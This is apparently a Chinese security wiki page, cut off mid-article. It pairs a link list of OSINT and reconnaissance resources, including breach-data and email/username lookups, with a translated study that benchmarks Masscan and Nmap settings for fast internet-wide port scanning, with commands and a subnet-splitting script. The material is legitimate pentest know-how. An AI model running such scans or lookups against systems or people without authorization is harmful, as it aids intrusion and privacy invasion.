&#x20;<https://www.networktotal.com/> ​ NetworkTotal ​ <http://www.packettotal.com/> ​ Packet Total ​ <https://www.netresec.com/?page=Networkminer> ​ NetworkMiner ​ <https://www.wireshark.org/download.html> ​ Wireshark

**无线网络信息**

&#x20;<https://opencellid.org/> ​ OpenCellid: Database of Cell Towers ​ <https://wigle.net/> ​ WiGLE: Wireless Network Mapping

**查询真实IP**

&#x20;<https://github.com/m0rtem/CloudFail> ​ CloudFail (T) ​ <http://www.crimeflare.com/> ​ CloudFlare Watch

**反查域名**

&#x20;<http://www.sameip.org/> ​ Same IP ​ <http://www.my-ip-neighbors.com/> ​ MyIPNeighbors ​ <http://www.tcpiputils.com/domain-neighbors> ​ TCP/IP Utils - Domain Neighbors ​ <http://www.bing.com/search?q=ip%3A8.8.8.8> ​ Bing IP Search (D) ​ <http://www.ipfingerprints.com/reverseip.php> ​ IP Fingerprints - Reverse IP Lookup

**黑名单**

&#x20;<http://www.projecthoneypot.org/list_of_ips.php> ​ Project Honey Pot ​ <http://iplists.firehol.org/> ​ FireHOL IP Lists ​ <https://isc.sans.edu/api/> ​ DShield API ​ <http://www.blocklist.de/en/index.html> ​ Blocklist.de

**声誉**

&#x20;<https://www.liveipmap.com/> ​ LiveIPMap IP Check ​ <https://exonerator.torproject.org/> ​ ExoneraTor ​ <http://www.ipvoid.com/> ​ IP Void

**BGP**

&#x20;<http://www.bgp4.as/tools> ​ BGP Tools ​ <https://www.peeringdb.com/advanced_search> ​ PeeringDB ​ <https://bgpstream.com/> ​ BGPStream ​ <http://bgpranking.circl.lu/> ​ BGP Malicious Content Ranking ​ <http://bgp.he.net/> ​ Hurricane Electric BGP Toolkit

**IPv6**

&#x20;<http://www.cidr-report.org/v6/as2.0/> ​ IPv6 CIDR Report

**IPv4**

&#x20;<https://hackertarget.com/reverse-dns-lookup/> ​ Hacker Target - Reverse DNS ​ <https://iptoasn.com/> ​ IP to ASN DB ​ <https://asn.cymru.com/> ​ Team Cymru IP to ASN ​ <https://reverse.report/> ​ Reverse.report ​ <http://www.cidr-report.org/as2.0/> ​ IPv4 CIDR Report ​ <https://www.onyphe.io/> ​ Onyphe

**主机 / 端口发现**

&#x20;<https://github.com/vesche/scanless> ​ Scanless ​ <https://urlscan.io/search/> \* ​ urlscan.io ​ <http://www.exfiltrated.com/querystart.php> ​ Internet Census Search ​ <http://internetcensus2012.bitbucket.org/paper.html> ​ Internet Census 2012 ​ <https://nmap.org/download.html> ​ Nmap (T) ​ <https://www.zoomeye.org/> ​ ZoomEye ​ <https://scans.io/> ​ Scans.io ​ <https://mrlooquer.com/> ​ Mr. Looquer ​ <https://www.shodan.io/> ​ Shodan

**地理位置**

&#x20;<https://www.ipaddress.my/> ​ My IP Address ​ <https://www.iptrackeronline.com/> ​ ipTRACKERonline ​ <https://www.infobyip.com/> ​ InfobyIP.com ​ <http://en.utrace.de/> ​ utrace ​ <http://www.infosniper.net/> ​ Info Sniper ​ <https://www.iplocation.net/> ​ IP Location Finder ​ <https://ipintel.io/> ​ ipintel.io ​ <https://db-ip.com/> ​ DB-IP ​ <http://www.ipfingerprints.com/> ​ IP Fingerprints ​ <https://www.ip2location.com/demo> ​ IP2Location.com ​ <http://ipverse.net/> ​ IPv4/IPv6 lists by country code ​ <https://www.maxmind.com/en/home> ​ MaxMind Demo

#### 域名

**工具**

&#x20;<https://github.com/gfek/Hunting-New-Registered-Domains> ​ Hunting-New-Registered-Domains (T) ​ <https://github.com/aancw/Belati> ​ Belati (T) ​ <https://github.com/ChrisTruncer/EyeWitness> ​ EyeWitness (T) ​ <http://mct.verisign-grs.com/> ​ International Domain Name Conversion Tool ​ <http://www.softpedia.com/get/Internet/Other-Internet-Related/IntelliTamper.shtml> ​ IntelliTamper (T) ​ <http://softbytelabs.com/en/BlackWidow/> ​ BlackWidow (T) ​ <https://portswigger.net/burp/> ​ Burp Suite (T)

**脆弱性**

&#x20;<https://github.com/danielmiessler/RobotsDisallowed> ​ RobotsDisallowed ​ 风险披露 ​ <http://zone-h.org/archive> ​ Zone-H.org ​ <https://www.xssposed.org/> ​ XSSposed.org ​ 扫描 ​ <https://magescan.com/> ​ Mage Scan ​ <https://github.com/1N3/Sn1per> ​ Sn1per (T)

**云资源**

&#x20;<https://github.com/jordanpotti/cloudscraper> ​ CloudScraper (T) ​ <https://buckets.grayhatwarfare.com/> ​ Public Buckets

**DNS安全**

&#x20;<http://dnsviz.net/> ​ DNSViz ​ <http://dnssec-debugger.verisignlabs.com/> ​ DNSSEC Analyzer

**社会分析**

&#x20;<https://www.reddit.com/domain/%3CURLhere%3E> ​ Reddit (M) ​ <https://www.google.com/trends/> ​ Google Trends

**变化检测**

&#x20;<http://www.changedetect.com/> ​ ChangeDetect ​ <http://watchthatpage.com/> ​ WatchThatPage ​ <https://github.com/thp/urlwatch> ​ Urlwatch ​ <https://www.followthatpage.com/> ​ Follow That Page ​ <http://www.changedetection.com/> ​ Change Detection ​ <http://visualping.io/> ​ VisualPing

**URL扩展工具**

&#x20;<http://www.knowurl.com/> ​ KnowURL ​ <http://wheredoesthislinkgo.com/> ​ Where Does This Link Go? ​ <http://www.urlunshortener.com/> ​ URL Unshortener ​ <http://urlex.org/> ​ URL Expander ​ <https://lengthen.me/> ​ Lengthen Me ​ <http://checkshorturl.com/> ​ CheckShortURL ​ <http://www.getlinkinfo.com/> ​ GetLinkInfo ​ <http://www.linkexpander.com/> ​ Link Expander

**分析**

&#x20;<https://github.com/urbanadventurer/WhatWeb> ​ WhatWeb ​ <https://www.webpagetest.org/> ​ WebPagetest ​ <http://siteliner.com/> ​ Siteliner ​ <http://websiteoutlook.com/> ​ Website Outlook ​ <https://www.similarweb.com/> ​ SimilarWeb ​ <https://w3dt.net/> ​ WWW Domain Tools ​ <http://pub-db.com/> ​ PubDB ​ <https://www.clearwebstats.com/> ​ ClearWebStats.com ​ <http://www.visualsitemapper.com/> ​ Visual Site Mapper ​ <http://www.sitedossier.com/> ​ Sitedossier ​ <https://w3bin.com/> ​ W3bin.com ​ <http://www.alexa.com/topsites> ​ Alexa Top 500 Global Sites ​ <http://s3-us-west-1.amazonaws.com/umbrella-static/index.html> ​ Cisco Umbrella Popularity List ​ <http://www.alexa.com/siteinfo> ​ Alexa Site Statistics ​ <http://tools.seobook.com/general/keyword-density/> ​ Keyword Density ​ <https://securityheaders.io/> ​ SecurityHeaders.io ​ <http://www.spyonweb.com/> ​ SpyOnWeb ​ <https://moz.com/researchtools/ose/> ​ Open Site Explorer ​ <http://www.statscrop.com/> ​ StatsCrop ​ <http://toolbar.netcraft.com/site_report?url=undefined> last\_reboot ​ Netcraft ​ <https://ewhois.com/> ​ Ewhois ​ <https://stackshare.io/> ​ StackShare ​ <http://moonsearch.com/> ​ Moonsearch ​ <https://www.semrush.com/> ​ SEMrush ​ <https://wappalyzer.com/> ​ Wappalyzer (T) ​ <https://www.sitesleuth.io/> ​ SiteSleuth ​ <http://builtwith.com/> ​ BuiltWith

**DNS排版(相似的域名)**

&#x20;<https://github.com/ring0lab/catphish> ​ Catphish (T) ​ <https://dnstwister.report/> ​ dnstwister ​ <http://www.morningstarsecurity.com/research/urlcrazy> ​ URLCrazy (T) ​ <https://github.com/elceef/dnstwist> ​ DNS Twist (T)

**域名黑名单**

&#x20;<https://www.mailboxvalidator.com/domain> ​ Email Domain Validation ​ <http://www.shadowserver.org/wiki/pmwiki.php?n=Services/Reports> ​ Shadowserver Foundation ​ <https://zeustracker.abuse.ch/blocklist.php> ​ ZeuS Tracker ​ <https://www.scumware.org/> ​ scumware.org ​ <http://www.malwareurl.com/index.php> ​ MalwareURL (R) ​ <http://www.malware.com.br/open-source.shtml> ​ Malware Patrol (R) ​ <http://www.malwaredomainlist.com/hostslist/hosts.txt> ​ Malware Domain List ​ <http://www.malwaredomains.com/wordpress/?page_id=66> ​ DNS-BH Malware Domain Blocklist ​ <http://malc0de.com/bl/> ​ DNS Sinkhole ​ <https://intel.criticalstack.com/> ​ Critical Stack Intel (R) ​ <https://github.com/maravento/blackweb> ​ Blackweb ​ <http://mirror1.malwaredomains.com/files/domains.txt> ​ Malware Domains Blacklist ​ <https://zeustracker.abuse.ch/blocklist.php?download=domainblocklist> ​ Zeus C2 Tracker ​ <http://www.networksec.org/grabbho/block.txt> ​ Threatexpert.com Malicious URLs ​ <http://ransomwaretracker.abuse.ch/downloads/RW_DOMBL.txt> ​ Ransomware Tracker Abuse.ch

**名誉**

&#x20;<http://hosts-file.net/> ​ hpHosts Online ​ <https://developers.google.com/safe-browsing/?csw=1> ​ Google Safe Browsing API ​ <http://app.webinspector.com/> ​ Web Inspector Online Scan ​ <http://www.malwaredomainlist.com/mdl.php> ​ Malware Domain List ​ <https://otx.alienvault.com/browse/pulses/> ​ AlienVault Open Threat Exchange ​ <https://vurldissect.co.uk/> ​ vURL Online ​ <http://www.brightcloud.com/tools/url-ip-lookup.php> ​ Webroot BrightCloud URL/IP Lookup ​ <http://www.avgthreatlabs.com/ww-en/website-safety-reports/> ​ AVG Threat Labs ​ <http://www.senderbase.org/> ​ Cisco SenderBase ​ <https://search.deepviz.com/> ​ Deepviz Domain Search ​ <https://www.url-analyzer.net/> ​ Joe Sandbox Url Analyzer ​ <http://zulu.zscaler.com/> ​ Zscaler Zulu URL Risk Analyzer ​ <https://sitereview.bluecoat.com/sitereview.jsp> ​ BlueCoat WebPulse ​ <https://www.threatminer.org/> ​ ThreatMiner.org ​ <https://sitecheck.sucuri.net/> ​ Sucuri SiteCheck ​ <http://www.reputationauthority.org/> ​ WatchGuard ReputationAuthority ​ <https://global.sitesafety.trendmicro.com/> ​ Trend Micro Site Safety Center ​ <http://www.trustedsource.org/> ​ McAfee TrustedSource ​ <http://fortiguard.com/iprep> ​ FortiGuard Reputation Service ​ <https://www.threatcrowd.org/> ​ Threat Crowd ​ <http://www.urlvoid.com/> ​ URL Void ​ <https://www.passivetotal.org/> ​ PassiveTotal ​ <http://urlquery.net/> ​ UrlQuery.net

**被动DNS**

&#x20;<https://dnsdumpster.com/> ​ DNS Dumpster ​ <http://ptrarchive.com/> ​ PTRarchive.com ​ <http://dnshistory.org/> ​ DNS History ​ <http://passivedns.mnemonic.no/> ​ Mnemonic ​ <https://securitytrails.com/> ​ Security Trails

**证书搜索**

&#x20;<https://github.com/lanrat/certgraph> ​ certgraph (T) ​ <https://crt.sh/>? ​ crt.sh - Certificate Search ​ <https://censys.io/> ​ Censys ​ <https://www.certificate-transparency.org/known-logs> ​ Google's Certificate Transparency

**发现**

&#x20;<http://analyzeid.com/> ​ AnalyzeID ​ <https://github.com/digininja/sitediff> ​ Sitediff ​ <http://redirectdetective.com/> ​ Redirect Detective ​ <http://sameid.net/> ​ SameID ​ <https://urlscan.io/search/> \* ​ urlscan.io ​ <https://punk.sh/> / ​ Punk.sh ​ <https://github.com/Sw4mpf0x/Kraken> ​ Kraken ​ <https://www.punkspider.org/> ​ PunkSPIDER ​ <https://www.shodan.io/> ​ Shodan

**子域名**

&#x20;<https://findsubdomains.com/> ​ FindSubDomains ​ <https://github.com/infosec-au/altdns> ​ AltDNS (T) ​ <https://github.com/aboul3la/Sublist3r> ​ Sublist3r ​ <http://netintel.net/> ​ Network Intelligence ​ <https://github.com/infosec-au/assetnote> ​ assetnote (T) ​ <https://github.com/hrbrmstr/gdns> ​ gdns (T) ​ <https://github.com/bitquark/dnspop> ​ dnspop (T) ​ <https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS> ​ SecLists DNS Subdomains (T) ​ <https://pentest-tools.com/information-gathering/find-subdomains-of-domain> ​ Pentest-tools.com Subdomains ​ <http://www.edge-security.com/theharvester.php> ​ theHarvester (T) ​ <https://github.com/RandomStorm/Bluto> ​ Bluto (T) ​ <https://github.com/davidpepper/fierce-domain-scanner> ​ Fierce Domain Scanner (T) ​ <https://github.com/OJ/gobuster> ​ Gobuster (T) ​ <https://github.com/darkoperator/dnsrecon> ​ DNS Recon (T) ​ <https://github.com/evilsocket/xray> ​ XRay ​ <https://bitbucket.org/LaNMaSteR53/recon-ng> ​ Recon-ng (T) ​ <https://www.google.com/?gws_rd=ssl> q=site:%3Cdomain.com%3E ​ Google Subdomains (D) ​ <https://github.com/michenriksen/aquatone> ​ Aquatone (T)

**Whois Records**

&#x20;<https://www.ip2whois.com> ​ IP2WHOIS ​ <https://domainsdb.info> ​ Domainsdb.info ​ <http://www.dailychanges.com/> ​ Daily DNS Changes ​ <http://viewdns.info/> ​ ViewDNS.info ​ <http://www.whoismind.com/> ​ Whoismind ​ <https://who.is/> ​ Who.is ​ <http://website.informer.com/> ​ Website Informer ​ <https://www.easywhois.com/> ​ easyWhois ​ <https://www.markmonitor.com/cgi-bin/affsearch.cgi>? ​ MarkMonitor Whois Search ​ <http://www.domaincrawler.com/> ​ Domaincrawler.com ​ <https://www.robtex.com/> ​ Robtex ​ <http://www.dnsstuff.com/tools> ​ DNSstuff ​ <https://whois.arin.net/ui/advanced.jsp> ​ Whois ARIN ​ <http://www.domainhistory.net/> ​ Domain History ​ <https://whoisology.com/> advanced ​ Whoisology ​ <https://dnsdumpster.com/> ​ DNS Dumpster ​ <http://domainbigdata.com/> ​ Domain Big Data ​ <http://whois.domaintools.com/> ​ DomainTools Whois ​ <https://www.domainiq.com/> ​ domainIQ ​ <http://centralops.net/co/DomainDossier.aspx> ​ Domain Dossier

#### 邮件相关

**邮件黑名单**

&#x20;<http://mxtoolbox.com/> ​ MxToolbox

**垃圾邮件信誉列表**

&#x20;<http://www.tcpiputils.com/dns-blackhole-list> ​ DNS Blackhole Lists

**数据泄露**

&#x20;<https://ashley.cynic.al/> ​ Ashley Madison Emails ​ <http://breachorclear.jesterscourt.cc/> ​ Breach or Clear ​ <https://www.vigilante.pw/> ​ Vigilante.pw ​ <https://intelx.io/> ​ Intelligence X ​ <https://dehashed.com/> ​ DeHashed ​ <https://haveibeenpwned.com/> ​ Have I been pwned?

**邮箱验证**

&#x20;<https://www.mailboxvalidator.com/demo> ​ MailboxValidator ​ <https://emailrep.io/> ​ Email Reputation ​ <http://www.readnotify.com/> ​ Read Notify ​ <http://www.email-validator.net/> ​ BytePlant Email Validator ​ <http://e-mailvalidator.com/index.php> ​ Email Validator ​ <http://verify-email.org/> ​ VerifyEmail ​ <http://mailtester.com/testmail.php> ​ MailTester

**常见电子邮件格式**

&#x20;<http://www.onelook.com/reverse-dictionary.shtml> ​ OneLook Reverse Dictionary and Thesaurus ​ <http://metricsparrow.com/toolkit/email-permutator/> ​ Email Permutator ​ <https://www.toofr.com/> ​ Toofr ​ <https://www.email-format.com/> ​ Email Format ​ <https://sites.google.com/site/emails4corporations/home> ​ Corporatate Email Formats

**邮件搜索**

&#x20;<http://www.skymem.info/> ​ Skymem ​ <https://maildb.io/> ​ MailDB ​ <https://github.com/m4ll0k/infoga> ​ Infoga (T) ​ <http://www.edge-security.com/theharvester.php> ​ theHarvester (T) ​ <http://www.reversegenie.com/email.php> ​ Reverse Genie Email ​ <https://www.voilanorbert.com/> ​ VoilaNorbert ​ <https://pipl.com/> ​ Pipl ​ <http://www.melissadata.com/lookups/emails.asp> ​ Email to Address (R) ​ <https://hunter.io/> ​ Hunter ​ <https://thatsthem.com/reverse-email-lookup> ​ ThatsThem

#### 用户名

**具体搜索(Specific Sites)**

&#x20;<http://pgp.mit.edu/> ​ MIT PGP Key Server ​ <https://keybase.io/> ​ Keybase ​ <https://www.gotinder.com/@%3Cusername%3E> ​ Tinder Usernames (M) ​ <https://api.github.com/users/%3Cusername%3E/events/public> ​ Github User (M) ​ <https://www.amazon.com/gp/registry/search.html/?ie=UTF8&type=wishlist> ​ Amazon Wishlists ​ <https://www.google.com/search?q=site:amazon.com+%3Cusername%3E> ​ Amazon Usernames (M)

**用户名搜索引擎**

&#x20;<https://instantusername.com/> ​ Instant Username Search ​ <https://namecheckup.com/> ​ NameCheckup ​ <http://checkusernames.com/> ​ Check Usernames ​ <https://thatsthem.com/> ​ Thats Them ​ <https://github.com/WebBreacher/WhatsMyName> ​ WhatsMyName (T) ​ <https://usersearch.org/> ​ UserSearch.org ​ <https://www.namecheckr.com/> ​ NameCheckr ​ <http://knowem.com/> ​ KnowEm ​ <https://github.com/HA71/Namechk> ​ Namechk (T) ​ <https://namechk.com/> ​ Namechk


# Nmap效率最大化

来源自Capt. Meelo https\://captmeelo.com/pentest/2019/07/29/port-scanning.html

## **0x00 写在前面**

最近一直在开发公司内部使用的<巡检系统>，在涉及端口扫描这块，为了保证速度和准确性，方案是使用Masscan+Nmap：Masscan速度快，先使用Masscan进行一遍全端口探测。再使用Nmap对已经探测出来的端口进行复扫和Banner识别，Nmap的准确性较高，但速度较慢，所以通过这种方式保证端口扫描的准确性。

这是我对于端口扫描过程中寻找速度与准确度之间平衡点的浅显思路。前几天刚好看到一篇国外的文章，介绍的东西远比我理解的更深入，故翻译出来一起学习。

如下内容为翻译内容，原文链接如下：\
[inding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning](https://captmeelo.com/pentest/2019/07/29/port-scanning.html)

## **0x01 介绍**

侦察是每个bug bounty(漏洞赏金)和渗透测试过程中最重要的阶段，一次好的侦察能决定成败。侦察可以分为两类：主动和被动。在主动侦察期间主要使用的方法之一就是端口扫描。渗透测试人员和bug hunters(漏洞赏金猎人)使用端口扫描确定目标主机和网络上的哪些端口是开放的，以及识别在这些端口上运行的服务。

但是，端口扫描总是需要在速度和精度之间进行权衡。在渗透测试期间，测试人员的时间都是有限的；而在bug bounty过程中，大家都是争先恐后的发现并提交漏洞，拼的是速度。这些原因迫使我们在端口扫描时优先考虑的是速度，而不是精度。而在于时间赛跑的过程中，我们可能会错过一些开放的端口，而恰巧这些端口可能就存在漏洞，并且能成功利用。

本次研究旨在利用开源和大家熟知的工具在端口扫描期间找到速度和准确度之间的平衡。

## **0x02 端口扫描概述**

端口扫描是侦察期间最常用的技术之一。渗透测试人员和bug bonty用于识别主机上可用的开放端口，以及识别这些开放端口上运行的服务。

端口扫描器可以根据他们的操作方式分类为：面向连接（同步模式）扫描器和无连接的（异步模式）扫描器。

### **面向连接（同步模式）**

这种类型的扫描器想目标端口发送请求并等待响应，直到超时时间到期。这种类型扫面器的缺点是性能比较慢，因为扫描器在当前连接关闭之前不会去扫描下一个目标端口或ip。

面向连接的扫描器好处是它们更准确，因为它们可以识别丢弃的数据包。\
面向连接扫描器最流行就是我们熟知的[**Nmap**](https://nmap.org/)。

### **无连接（异步模式）**

无连接扫描器不依赖于当前被探测端口的完成来启动下一个端口，因为它们有单独的发送和接受线程。这允许它们进行高速扫描。但是，这些扫描器的结果可能不太准确，因为它们无法检测丢失的数据包。

[**Masscan**](https://github.com/robertdavidgraham/masscan)和[**Zmap**](https://github.com/zmap/zmap)是目前最流行的两种无连接扫描器。

## **0x03 Nmap VS Masscan**

> 本次研究只包括Nmap和Masscan。虽然Zmap是一个快速的扫描器，并且扫描结果还不错。但是根据经验，即使同时运行多个扫描任务，Zmap的扫描速度仍然很慢。

虽然Nmap和Masscan都提供了良好的性能、特性和扫描结果。但它们仍然有自己的弱点。下表展示了这两种工具的优缺点。

请注意，这不是两种工具之间的详细比较。只列出了与研究相关的内容。

|    | Nmap                                                             | Masscan                                                                                                                                          |
| -- | ---------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------ |
| 优点 | <p>-两者对比起来，它更精确（使用同步模式）<br>-有很多功能<br>-同时接受域名和IP地址（IPv4和IPv6）</p> | <p>-速度非常快（使用异步模式）<br>-语法与Nmap非常相似</p>                                                                                                            |
| 缺点 | -扫描数十万目标的时候速度非常慢                                                 | <p>-在高速率(rates)扫描大端口范围时结果不太准确<a href="https://github.com/robertdavidgraham/masscan/issues/365">\[1]</a><br>-不接受域名作为目标输入<br>-不能根据自身环境自动调整传输速率</p> |

## **0x04 研究思路**

基于上面列出的工具的有点和缺点，在试图找到速度和准确度之间的平衡时，确定了一下解决方案和问题。

### **解决方案**

以下是基于工具的优点而形成的：

1. 将Nmap的准确性及其其他的功能与Masscan的速度相结合。
2. 使用Masscan执行初始端口的扫描，以识别开放的端口和开端口的主机。
3. 使用Masscan的结果（已识别的开放端口和主机）作为Nmap的输入，以进行详细的端口扫描。

### **问题**

虽然上面列出的想法很好，但是我们仍然需要解决每个工具的缺点。具体来说，我们需要解决的有：

1. 当扫描数数万个目标的时候，Nmap的速度很慢。
2. Masscan在高速(rates)扫描大端口范围时的不准确性（参见Github的[Issues 365](https://github.com/robertdavidgraham/masscan/issues/365)）。

## **0x05 研究配置**

### **目标网络**

选择一下子网作为本次研究的网络目标：

| 目标 | 子网         |
| -- | ---------- |
| A  | A.A.0.0/16 |
| B  | B.B.0.0/16 |
| C  | C.C.0.0/16 |
| D  | D.D.0.0/16 |

### **测试用例**

对于本次研究，两种工具都有自己的一些测试用例。这些测试用例是每种工具中可用的不同选项（参数）的变化。这些测试用例旨在解决工具的缺点，并利用它们的优点在速度和准确性之前找到平衡点。

#### **Masscan:**

1. 以不同的速率(rates)定期扫描所有的TCP端口。
2. 将/16的目标子网差分为/20，并运行X个并发masscan任务，每个任务的速率为Y。
3. 将1-65535的端口范围划分为几个范围，并运行X个并发的Masscan任务，每个任务的速率为Y。

#### **Nmap:**

1. 定期扫描所有的TCP端口。
2. 使用X并发任务扫描所有的TCP端口。
3. 扫描Masscan识别的开放端口和主机的组合列表。
4. 扫描Masscan识别特定主机上的特定开放端口。

> 在有限的时间内不可能涵盖所有选项的每个变化/组合，因此仅涵盖上述内容。

对于使用并发任务的测试用例，使用了工具[GNU Parallel](https://www.gnu.org/software/parallel/)。如果你对这个工具还是个新手，请查看详细的[教程](https://www.gnu.org/software/parallel/parallel_tutorial.html)。

## **0x06 范围和限制**

* 该研究使用以下版本的工具进行：Nmap v7.70和Masscan v1.0.5-51-g6c15edc；
* 该研究仅涉及IPv4地址；
* 不包括扫描UDP端口；
* 仅使用了最流行和开源的工具（不包括Zmap，因为它一次只能扫描一个端口；即使运行多个任务，也会导致扫描速度非常慢）；
* 仅探测了4个目标网络，都是/16；
* 端口扫描仅来自一台机器，且这台机器的ip地址是固定ip；
* 由于扫描机器不支持PF\_RING，因此Masscan的速率仅限于**250kpps(每秒数据包)**；
* 并不是所有的测试用例都是由有限的资源而进行的（这样做非常耗时）。

## **0x07 Masscan的测试用例和测试结果**

本节详细介绍了使用Masscan执行的不同测试用例和其测试结果。

### **测试用例 #1：使用不同的速率定期扫描所有的TCP端口**

这个测试用例没啥特别之处，这只是Masscan的正常扫描，只是速率不同而已。

以下命令用于启动此扫描用例的扫描任务：

```
masscan -p 1-65535 --rate RATE--wait 0 --open TARGET_SUBNET -oG TARGET_SUBNET.gnmap
```

**rate(扫描速率)参数的设置：**

* 1000000 (1M)
* 100000 (100K)
* 50000 (50K)

在实验过程中，我得VPS可以运行的最大速率仅为250kpps左右。这是因为扫描的机器不支持PF\_RING。

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWRdXj5RxWTUdWctguY%2F250kpps.jpg?alt=media\&token=1ab30c94-aeaa-4ce2-85a0-783d85d7e719)

**图表（由于最大速率是250kpps，故图表中的为250k、100k和50k的对比）：**

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWRdgSHEq-dRScVPmE7%2Fmasscan-test1.png?alt=media\&token=637d3518-32ca-4f0b-8dcc-73b852c3c162)

**观察：**

* 慢速率会导致发现更多的开放端口，但是代价就是扫描花费的时间更长。

### **测试用例 #2：将/16的目标子网拆分为/20，并运行X个Masscan并发任务，每个任务的速率为Y**

为了能够运行并发任务，我觉得将/16的目标子网拆分为更小的子网。你可以将其分为更小的子网，例如/24。本次研究我拆分为/20。

要将目标网络拆分为更小的子网，使用的python代码如下：

```
#!/usr/bin/python3
import ipaddress, sys

target = sys.argv[1]
prefix = int(sys.argv[2])

for subnet in ipaddress.ip_network(target).subnets(new_prefix=prefix):
    print(subnet)
```

以下是该代码的运行截图：

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWReFi_snFWtofzwgTz%2Fsplit_sub.jpg?alt=media\&token=444b0d45-b971-49b8-a0a3-543b5dace335)

每项任务所用的速率都是基于扫描机器能够处理的速率最大化思想。在我的例子中，我的扫描机器最大只能处理250kpps，所以如果我要运行5个并行任务，每个任务可使用50kpps的速率。

> 由于机器的最大速率不是“绝对”的（在本次测试中不完全都是250kpps的速率），你可以设置每个任务的速率，使总速率等于最大速率的80%-90%。

对于本项测试，执行了以下命令。通过split.py来划分成较小的子网，然后使用parallel命令来运行并行任务。

```
python3 split.py TARGET_SUBNET 20 | parallel -j JOBS "masscan -p 1-65535 --rate RATE--wait 0 --open {} -oG {//}.gnmap"
```

以下是执行上述命令时的截图。在这种情况下，20个Masscan任务，每个任务的速率为10kpps，同时运行。

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWReUWQU0YlXtVI_qta%2Fmasscan-20jobs.png?alt=media\&token=9cc68e10-cfe5-48eb-9d6f-6e7b2f22c3e6)

任务数和速率如下：

* 5个任务/每个任务的速率是100kpps (--rate 100000 )
* 5个任务/每个任务的速率是50kpps (--rate 50000)
* 20个任务/每个任务的速率是10kpps (--rate 10000)

> **说明：**
>
> * 大家可以注意到，我上面说的任务数和速率中第一个（5个任务/每个任务的速率是100kpps），我计算错了。因为它的总速率是500kpps，而我的机器只能处理250kpps。尽管如此，这个的测试结果仍然是有价值的，将可以在下面的图表里看到。
> * 其他的组合，例如10个任务，每个任务的速率20kpps，这样是可行的。但是由于时间和预算有限，我不能把所有可能的组合都涵盖了。

**图表如下：**

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWRekP5nyZhOKPusX7k%2Fmasscan-test2.png?alt=media\&token=5040b352-bbc5-438d-ba7d-1ee87c35725f)

**观察：**

* 当前的方案会比常规扫描（测试用例 ＃1）快2-3倍，但是导致开放的端口更少了。
* 使用扫描机器的最大速率将导致扫描出的开放端口数更少（五个任务/每个任务100k的扫描速率）。
* 少任务数&高扫描速率（例如5个任务/每个任务的速率50k）比多任务数&低扫描速率（例如20个任务/每个任务的速率10k）的效果好。

### **测试用例 #3：将1-65535端口范围拆分为多个更小的范围，运行X个Masscan并发任务，每个任务的扫描速率为Y**

第三个测试用例是为了解决在扫描大端口范围的时候，上文提到的Masscan的[问题](https://github.com/robertdavidgraham/masscan/issues/365)，特别是整个1-65535这样的范围。我的解决方案是将1-65535的范围拆分为更小的范围。

就像之前的测试用例一样，所使用的任务数&扫描速率组合的总速率是基于机器最大容量的80-90%这样的想法。

以下的命令用于本次的测试用例，PORT\_RANGES是包含端口范围列表，然后使用parallel命令来运行并行任务。

```
cat PORT_RANGES | parallel -j JOBS "masscan -p {} --rate RATE --wait 0 --open TARGET_SUBNET -oG {}.gnmap"
```

1-65535端口范围分为四种拆分方式，如下所示，每种拆分方式包含任务和速率的组合/变化。

### 拆分方式 #1：拆分为5个端口范围

```
1-13107
13108-26214
26215-39321
39322-52428
52429-65535
```

**任务数和速率如下：**

* 5个扫描任务/每个任务50k的扫描速率 (--rate 50000)
* 2个扫描任务/每个任务100k的扫描速率 (--rate 100000)

**图表如下：**

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWRfVAmuTqnyPjcsaXX%2Fmasscan-test3-1.png?alt=media\&token=f95ba3d4-3f42-4dd2-b80e-ba23cca50871)

### **拆分方式 #2：拆分为2个端口范围**

```
1-32767
32768-65535
```

**任务数和速率如下：**

* 2个扫描任务/每个任务100k的扫描速率 (--rate 100000)
* 2个扫描任务/每个任务125k的扫描速率 (--rate 125000)

**图表如下：**

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWRfiBJ-r3gpHAuikZ6%2Fmasscan-test3-2.png?alt=media\&token=a36fbfc8-62e5-496d-b4ae-c2e02076c678)

### **拆分方式 #3： 拆分为8个端口范围**

```
1-8190
8191-16382
16383-24574
24575-32766
32767-40958
40959-49151
49152-57343
57344-65535
```

**任务数和速率如下：**

* 4个扫描任务/每个任务50k的扫描速率 (--rate 50000)
* 2个扫描任务/每个任务100k的扫描速率 (--rate 100000)

**图表如下：**

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWRftJkyqA15tWCj0T-%2Fmasscan-test3-3.png?alt=media\&token=0828f3f0-4961-453a-ae25-7b5ffc374fa6)

### **拆分方式 #4： 拆分为4个端口范围**

```
1-16383
16384-32767
32768-49151
49152-65535
```

**任务数和速率如下：**

* 2个扫描任务/每个任务100k的扫描速率 (--rate 100000)

> 本次测试我之所以只使用了一种任务数&速率的组合，是因为我意识到我已经超过了每个月的带宽限制。这样我不得不多付100+美元。

**图表如下：**

